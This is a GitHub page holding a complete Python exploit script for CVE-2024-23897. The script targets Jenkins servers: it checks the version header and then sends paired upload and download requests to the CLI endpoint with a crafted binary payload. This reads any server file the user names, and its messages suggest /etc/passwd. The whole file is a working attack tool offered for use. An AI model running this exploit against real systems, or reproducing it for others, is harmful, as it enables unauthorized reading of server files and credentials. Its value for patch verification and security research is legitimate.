-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2024-23897.py
279 lines (228 loc) · 9.44 KB
/
CVE-2024-23897.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
#!/usr/bin/env python3
import re
import sys
import time
import uuid
import urllib3
import requests
import argparse
import threading
from packaging.version import Version
from dataclasses import dataclass
# Disables a pyright warning, because its annoying
# pyright: reportOptionalMemberAccess=false
# Disables the InsecureRequestWarning because we set verify to False because of proxies
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Global variable for the args
args = None
def log_success(msg: str):
"""
Logs a success message to stdout
Arguments:
msg(str): The message to log
"""
print(f"[+] {msg}")
def log_failure(msg: str):
"""
Logs a failure message to stdout
Arguments:
msg(str): The message to log
"""
print(f"[-] {msg}")
def log_info(msg: str):
"""
Logs a info message to stdout
Arguments:
msg(str): The message to log
"""
print(f"[*] {msg}")
def log_result(msg: str):
"""
Logs a result message to stdout
Arguments:
msg(str): The message to log
"""
print(f"[>] {msg}")
@dataclass
class ParsedArgs:
url: str
force: bool
raw: bool
proxy: dict[str, str]
headers: dict
cookies: dict
filepath: str
timeout: int
def parse_args() -> ParsedArgs:
"""
Parses the command line args
Required arguments are marked by a star (*)
Returns:
ParsedArgs: the parsed args
"""
# Add some default checks
parser = argparse.ArgumentParser(description="CVE-2024-23897 exploit script by cc3305")
parser.add_argument("url", action="store", help="Target url")
parser.add_argument("-f", "--force", action="store_true", help="Force the exploit (skip the check if the host is vulnerable)")
parser.add_argument("--raw", action="store_true", help="Gets the raw output returned from the webserver, instead of the parsed version. Use this if the output doesnt look right.")
parser.add_argument("--timeout", type=int, default=20, help="The timeout of the requests in seconds. Defaults to 20s.")
parser.add_argument("-x", "--proxy", action="store", help="HTTP proxy in the format http://127.0.0.1:8080")
parser.add_argument("-H", "--headers", action="append", help="Request Headers in the format `\"Header-Name: Header-Value\"`. Multiple -H flags are allowed")
parser.add_argument("-c", "--cookies", action="store", help="Cookie data in the format `\"COOKIE1=VALUE1; COOKIE2=VALUE2\"`")
parser.add_argument("-FP", "--file-path", action="store", dest="filepath", help="* File to read on the server", required=True)
# Return the parsed args
result = parser.parse_args()
# Bring the proxy, cookies and headers into a pythonic format
result.proxy = {"http": result.proxy, "https": result.proxy}
headers = {}
if(result.headers != None):
for header in result.headers:
try:
header_parts = header.split(":")
headers[header_parts[0]] = header_parts[1].lstrip()
except:
continue
result.headers = headers
cookies = {}
if(result.cookies != None):
for cookie in result.cookies.split(";"):
try:
cookie_parts = cookie.split("=")
cookies[cookie_parts[0]] = cookie_parts[1]
except:
continue
result.cookies = cookies
# The program always assumes the url is in the format http://something.com/, not in http://something.com
if not result.url.endswith("/"):
result.url= f"{result.url}/"
return ParsedArgs(**vars(result))
def check_vulnerable() -> bool:
"""
Check if the target is vulnerable
If there is no way to determine if the host is vulnerable just return true
Returns:
bool: True if the target is vulnerable, False otherwire
"""
# To check if the host is vulnerable, just make a request and check the X-Jenkins response header
resp = requests.get(f"{args.url}", verify=False, proxies=args.proxy, headers=args.headers, cookies=args.cookies, timeout=args.timeout)
if "X-Jenkins" not in resp.headers:
log_failure("Could not get the version from the header of a server response")
return False
# We can differentiate between lts and normal by the version number
# LTS follows X.YYY.Z
# Normal follow X.YYY
version = Version(resp.headers["X-Jenkins"])
if len(version.release) == 3:
# LTS
log_info(f"Version {str(version)} (LTS) detected")
return version <= Version("2.426.2")
# Not LTS
log_info(f"Version {str(version)} detected")
return version <= Version("2.441")
def upload_req(payload: bytes, uuid: str):
"""
Make the upload request
Arguments:
payload(bytes): The payload to upload
uuid(str): A uuid acting as a session identifier """
additional_headers = {"Session": uuid, "Side": "upload", "Content-Type": "application/octet-stream"}
headers = additional_headers | args.headers
try:
upload_resp = requests.post(f"{args.url}cli?remoting=false",
data=payload,
verify=False,
proxies=args.proxy,
headers=headers,
cookies=args.cookies,
timeout=args.timeout)
except requests.exceptions.ReadTimeout:
log_failure("Upload request timed out. This can happen, because some files just dont like to be read or maybe the file just doesn't exist. (Try /etc/passwd to confirm the exploit or increase timeout time via --timeout)")
return
# Upload failed
if upload_resp.status_code == 500:
log_failure("Could not upload payload. This exploit requires precise timing and can therefore sometimes just fail. Try re-running it a few (5-10) times.")
return
# build a table mapping all non-printable characters to None
LINE_BREAK_CHARACTERS = set(["\n", "\r"])
NOPRINT_TRANS_TABLE = {
i: None for i in range(0, sys.maxunicode + 1) if not chr(i).isprintable() and not chr(i) in LINE_BREAK_CHARACTERS
}
def make_printable(s: str) -> str:
"""
Replace non-printable characters in a string.
Arguments:
s(str): The string to filter
Returns:
str: The filtered string
"""
# the translate method on str removes characters
# that map to None from the string
return s.translate(NOPRINT_TRANS_TABLE)
def parse_result(text: str) -> str:
"""
Parses the file content from the server response
Arguments:
text(str): The body from the download response
Returns:
str: The parsed string
"""
# Very primitive
# The output contains non printable characters like 0x00 which we need to filter out
filtered_text = make_printable(text)
matches = re.search(r"Too many arguments: (.*)\n[\S\n\t\v ]*\(default: (.*)\)", filtered_text)
if matches is None:
log_info("Could not parse the output")
return text
second_line = matches.group(1)
first_line = matches.group(2)
return f"{first_line}\n{second_line}"
def download_req(uuid: str):
"""
Make the download request
Arguments:
uuid(str): A uuid acting as a session identifier
"""
additional_headers = {"Session": uuid, "Side": "download"}
headers = additional_headers | args.headers
try:
download_resp = requests.post(f"{args.url}cli?remoting=false",
verify=False,
proxies=args.proxy,
headers=headers,
cookies=args.cookies,
timeout=args.timeout)
except requests.exceptions.ReadTimeout:
log_failure("Download request timed out. This can happen, because some files just dont like to be read or maybe the file just doesn't exist. (Try /etc/passwd to confirm the exploit or increase timeout time via --timeout)")
return
# If the text is just \x00, the payload was not uploaded or executed
if download_resp.text == "\x00":
log_failure("No output, even though upload was successful?")
return
if args.raw:
log_result("Result:\n" + download_resp.text)
return
parsed_result = parse_result(download_resp.text)
log_result("Result:\n" + parsed_result)
def run_exploit():
global upload_success
data_string = b"\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@" + args.filepath.encode() + b"\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03"
session_uuid = str(uuid.uuid4())
# This exploit requires precise timing and the upload and download request must be sent at around the same time
# If the upload request fails with a code 500, the exploit failed and we dont need to wait for the download response
upload_thread = threading.Thread(target=upload_req, args=(data_string, session_uuid))
download_thread = threading.Thread(target=download_req, args=(session_uuid, ))
download_thread.start()
time.sleep(0.1)
upload_thread.start()
download_thread.join()
upload_thread.join()
def main():
global args
args = parse_args()
if not args.force:
if not check_vulnerable():
log_failure(f"Host seems to not be vulnerable, use --force to override")
exit(0)
run_exploit()
if __name__ == "__main__":
main()